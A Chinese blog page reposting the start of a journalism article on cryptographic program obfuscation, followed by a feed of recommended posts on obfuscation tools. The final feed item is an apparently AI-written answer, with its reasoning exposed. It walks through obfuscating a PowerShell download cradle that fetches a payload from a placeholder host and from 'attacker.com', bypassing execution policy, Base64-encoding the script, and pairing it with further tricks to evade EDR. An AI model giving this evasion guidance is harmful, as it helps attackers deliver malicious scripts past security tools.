外媒一篇关于program obfuscation的最近进展的报道

最新推荐文章于 2024-08-08 07:49:37 发布
原创 最新推荐文章于 2024-08-08 07:49:37 发布 · 1.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Cryptopp #密码学

cited from:  https://www.simonsfoundation.org/quanta/20140130-perfecting-the-art-of-sensible-nonsense/

Perfecting the Art of Sensible Nonsense

By:Erica Klarreich

January 30, 2014

这篇文章介绍了最近(2013年以来)在密码学界比较重要的一个突破的背景。

As a graduate student at the Massachusetts Institute of Technology in 1996,Amit Sahai was fascinated by the strange notion of a “zero-knowledge” proof, a type of mathematical protocol for convincing someone that something is true without revealing any details of why it is true. As Sahai mulled over this counterintuitive concept, it led him to consider an even more daring notion: What if it were possible to mask the inner workings not just of a proof, but of a computer program, so that people could use the program without being able to figure out how it worked?

The idea of “obfuscating” a program had been around for decades, but no one had ever developed a rigorous mathematical framework for the concept, let alone created an unassailable obfuscation scheme. Over the years, commercial software companies have engineered various techniques for garbling a computer program so that it will be harder to understand while still performing the same function. But hackers have defeated every attempt. At best, these commercial obfuscators offer a “speed bump,” said Sahai, now a computer science professor at the University of California, Los Angeles. “An attacker might need a few days to unlock the secrets hidden in your software, instead of a few minutes.”

Secure program obfuscation would be useful for many applications, such as protecting software patches, obscuring the workings of the chips that read encrypted DVDs, or encrypting the software controlling military drones. More futuristically, it would allow people to create autonomous virtual agents that they could send out into the computing “cloud” to act on their behalf. If, for example, you were heading to a remote cabin in the woods for a vacation, you could create and then obfuscate a computer program that would inform your boss about emails you received from an important client, or alert your sister if your bank balance dropped too low. Your passwords and other secrets inside the program would be safe.

“You could send that agent into the computing wild, including onto untrusted computers,” Sahai said. “It could be captured by the enemy, interrogated, and disassembled, but it couldn’t be forced to reveal your secrets.”

As Sahai pondered program obfuscation, however, he and several colleagues quickly realized that its potential far surpassed any specific applications. If a program obfuscator could be created, it could solve many of the problems that have driven cryptography for the past 40 years — problems about how to conduct secure interactions with people at, say, the other end of an Internet connection, whom you may not know or trust.

“A program obfuscator would be a powerful tool for finding plausible constructions for just about any cryptographic task you could conceive of,” said

最低0.47元/天 解锁文章

200万优质内容无限畅学
Revoke-Obfuscation:一款功能强大的PowerShell混淆检测框架
ZL_1618的博客
08-24 198
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
关于Obfuscation based on multilinear map学习
vingstar的专栏
03-14 1821
看关于program obfuscation相关的内容已经近两个多月了,却难以说有什么真正的进展。断断续续的进行着,很难将工作有整体性的一直深入下去。 但时间不等人,这一个项目目前如果在短时间内仍然在solution的寻找上没有突破很可能就要流产了。所以必须打起十二分的精神来!多看多思。 今天(314)重新再看论文《OC13》,由于multilinear无论其原理还是实现都将会十分困难
obfuscation-stuff:源代码混淆和二进制混淆,多种语言和多种平台。 包括250多个工具和600多个帖子
05-16
Obfuscate 源码混淆和二进制混淆,包括多种语言和多个平台。250+工具和600+文章 目录 -> -> -> confuserex -> (3)工具 (6)文章 (7) 工具 (10) 文章 PowerShell invoke-obfuscation -> (1)工具 (7)文章 (9) 工具 (33) 文章 JavaScript javascript-obfuscator -> (7)工具 baffle -> (1)工具 jstillery -> (1)工具 (16) 工具 (64) 文章 LLVM obfuscator -> (7)工具 armariris -> (1)工具 (1)文章 tigress -> (1)工具 (10) 工具 (18) 文章 Shellcode -> (6)工具 (7)文章 Bash bashfuscator ->
Invoke-Obfuscation 使用教程
gitblog_00312的博客
08-08 639
Invoke-Obfuscation 使用教程 Invoke-ObfuscationPowerShell Obfuscator项目地址:https://gitcode.com/gh_mirrors/in/Invoke-Obfuscation 项目介绍 Invoke-Obfuscation 是一个用于混淆 PowerShell 脚本的工具,旨在帮助用户理解和应用混淆技术,以绕过基于签名的检测机制。...
基于Allatori7.6的Java代码混淆
HParanoid的博客
02-20 3744
基于Allatori7.6对Java代码实现代码混淆 第一步:下载Allatori7.6 http://www.allatori.com/ 第二步:解压Allatori-7.6-Demo.zip 解压下来就是这个样子,然后你可以用两种方式实现代码混淆 方式一:就是在你项目中打包的时候进行混洗代码 第一步:Allatori-7.6-Demo下的lib下面的jar包复制到你要打包的项目中去 第二步:配置在你项目下src/main/resources新建一个allatori.xml这个文件 <confi
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 支持...
data_obfuscation:基于残数编码(RNC)的CC ++代码的数据混淆
02-02
data_obfuscation:基于残数编码(RNC)的CC ++代码的数据混淆
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2960
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
区块链中涉及到密码学的场景
CHYabc123456hh的博客
08-28 727
区块链中涉及到密码学的场景 共识算法(Consensus algorithm) 交易签名(Signing transaction) 第二层网络如何在第一层网络中验证(Layer2’s verification on Layer1) 验证跨链交易(Verifying the cross chain tx) 通过多种数字签名进行 Rollup 扩容(Rollup with different digital signature)(什么是 Rolllup?) 跨分片(Cross-shard) 区块链
什么是Program ?乐队现场新成员!性价比超高Program设备使用心得分享
PrettySound的博客
12-23 1904
今天新鲜出炉的节目也是很多朋友询问已久的关于PROGRAM的话题。各个平台都有一些对现场播放音乐感兴趣的小伙伴问我这个问题,挺多年了。随着现代音乐现场的不断发展PROGRAM播放已经成为了非常普遍的现象,如果你还不了解它那么欢迎你来听听我跟你聊聊我曾经走过的那些弯路,出现过的那些现场事故,以及分享最近这五年我一直在现场使用的PROGRAM播放设备:Cymatic Audio LP16。 点击阅读全文:https://www.prettysound.net/blog/shi-yao-shi-programle
一款JavaScript 混淆(Obfuscator)工具(Tool)的研究(一)
lacoucou的专栏
04-10 3879
1.研究使用的工具及网站 https://obfuscator.io 主要研究对象,主要是研究此网站的各种混淆方法及破解办法。 http://jsnice.org/ 用来格式化代码,方便调试。 notepad++ 编辑代码。 某浏览器 具有谷歌内核的浏览器,主要用来调试JS代码。 2.网站功能选...
使用ObfuscationAttribute防止混淆工具自动模糊处理
dengzi4373的博客
01-04 1211
在Reflection的强大和Reflector的盛行下,.NET产品的内部实现越来越透明,在恶意用户和Cracker面前,基本上已是砧板上的肉,被切到什么程度只能祈祷遇到的都是钝刀子;于是一批批的混淆工具应声而出,虽然他们的实现机制可能不同,但是都相同的是,使用这些工具的时候,需要为对应要混淆的产品写相当不简单的配置文件,里面描述哪些需要加密,哪些需要排除。那么,有没有办法在A...
Java 混淆器大全
蜡笔小辛的专栏
05-13 3252
Author/CompanyProgramShrinkingObfuscationLicenseEric LafortuneProGuardFree (GPL)Jochen HoenickeJodeFree (GPL)Hidetoshi OhuchiJargFree (BSD)NQ4
混淆工具javascript-obfuscator使用简介
热门推荐
楚游香的博客
11-29 2万+
javascript-obfuscator是一个免费的JavaScript代码混淆工具,它功能强大,可以把你的源代码变得“面目全非”,完全没有可读性。还具有部分防调试功能,给JavaSc...
2015年十大黑客测试工具你认识几个?
wuxiaobingandbob的专栏
01-07 4950
http://diyitui.com/content-1452055433.37271288.html 来自:FreeBuf.COM关注黑客与极客(微信号:freebuf) 原文地址:concise-courses,FB小编FireFrank编译 链接:http://www.freebuf.com/tools/91462.html 如果你真的喜欢安全,了解下面这些工
对Craig Gentry的几个工作的最基本入门了解
vingstar的专栏
03-20 5149
Craig Gentry是Dan Boneh的博士生,在他攻读博士学位期间,他成功的提出了一个了fully homomorphic encryption scheme,这一构造的基础是一些关于Ideal Lattice的技术。他在他的博士论文(A FULLY HOMOMORPHIC ENCRYPTION SCHEME 2009年)中更近一步较为详细的介绍了他的这一工作。
几个基本的密码学概念
vingstar的专栏
06-24 4544
什么是cryptographic  An oracle is an individual who knows the personal cell phone number of a god. This enables him (or her) to obtain some information which is usually considered as out of reach
<Introduction to modern Cryptogrsphy>读书笔记
vingstar的专栏
07-23 2022
之前看得一些密码学教材要么是很偏应用层次,全书没有给
kali Invoke-Obfuscation
最新发布
06-07
<think>嗯,我需要帮助用户在KaliLinux中使用Invoke-PSObfuscation进行PowerShell脚本混淆。首先,回顾用户的问题和提供的引用,特别是引用[1]提到该工具可以在Windows和KaliLinux上使用,项目地址在GitHub。用户之前询问的是Invoke-Obfuscation,但根据引用[1]的名称是Invoke-PSObfuscation,可能拼写有差异,需要确认两者是否相同或是否有不同。查看引用[3]提到"工具的主要执行文件",说明可能存在执行脚本。接下来,用户的环境是KaliLinux,所以需要确保系统已安装必要的依赖,如PowerShell。引用[2]中的命令涉及PowerShell执行策略,说明在Linux上运行PowerShell命令需要先安装。步骤应包括安装PowerShell、下载工具、导入模块、执行混淆操作。同时,引用[4]展示了一个使用混淆后脚本的例子,可以作为测试混淆效果的参考。用户可能需要知道如何验证混淆后的脚本是否有效。在注意事项部分,引用[5]给出了一个状态码检查的脚本示例,可能需要提示用户测试混淆后的脚本在目标环境中的兼容性。此,需要考虑绕过执行策略的问题,如引用[2]中的-IEX(Invoke-Expression)方式,但引用[1]提到该工具自带编码功能,可能简化流程。最后,根据引用[1]的项目地址,用户需要正确克隆仓库,确保路径正确。需要提醒用户注意参数使用,如输入文件路径、输出位置,以及可能的混淆策略选择(如Token、String、Command等)。安全方面强调仅在授权环境下使用。</think> 以下是在Kali Linux中使用**Invoke-PSObfuscation**进行PowerShell脚本混淆的完整步骤(引用[1][3]),包含关键细节: ### 详细操作步骤 1. **安装PowerShell依赖** ```bash sudo apt update && sudo apt install -y powershell pwsh # 进入PowerShell交互环境 ``` 2. **下载工具(引用[1])** ```bash git clone https://gitcode.com/gh_mirrors/in/Invoke-PSObfuscation.git cd Invoke-PSObfuscation ``` 3. **导入模块(引用[3])** 在PowerShell环境中执行: ```powershell Import-Module ./Invoke-PSObfuscation.ps1 ``` 4. **执行混淆(核心操作)** ```powershell # 示例:混淆'http://x.x.x.x/b'下载字符串(引用[4]的简化) Invoke-PSObfuscation -ScriptBlock { (New-Object Net.WebClient).DownloadString('http://x.x.x.x/b') } -Command -All -OutputFile obfuscated.ps1 ``` **参数说明**: - `-Command`:混淆命令调用 - `-All`:启用所有混淆技术 - `-OutputFile`:输出文件路径 5. **测试混淆效果** ```powershell # 执行混淆后的脚本(需允许执行策略) Set-ExecutionPolicy Bypass -Scope Process -Force .\obfuscated.ps1 ``` ### 注意事项 1. **执行策略绕过**(引用[2][4]) 添加参数到混淆后的脚本头部: ```powershell powershell.exe -ExecutionPolicy Bypass -File obfuscated.ps1 ``` 2. **编码功能** 工具自带Base64编码功能(避免额处理): ```powershell Invoke-PSObfuscation ... -Encode -OutputCommand ``` 3. **网络请求混淆**(引用[4]) 对URL字符串使用`-String`策略: ```powershell Invoke-PSObfuscation -String "http://attacker.com/payload" -OutputCommand ``` ### 混淆策略对照表 | 参数 | 效果 | 适用场景 | |---------------|--------------------------|-----------------| | `-Token` | 重命名变量/函数 | 对抗静态分析 | | `-String` | 字符串分割/编码 | 隐藏关键URL/参数 | | `-Command` | 命令重组为不可读形式 | 规避命令检测 | | `-WhiteSpace` | 删除所有空格/换行 | 压缩脚本体积 | ### 验证建议(引用[5]) ```powershell # 检查混淆后脚本状态 $status = & .\obfuscated.ps1 *>&1 if ($LASTEXITCODE -eq 0) { "执行成功" } else { "需要调试" } ``` > **重要提示**:混淆后的脚本仍可能被高级EDR检测,建议配合其他规避技术(如API Hook绕过)使用。该工具仅限授权测试环境使用[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值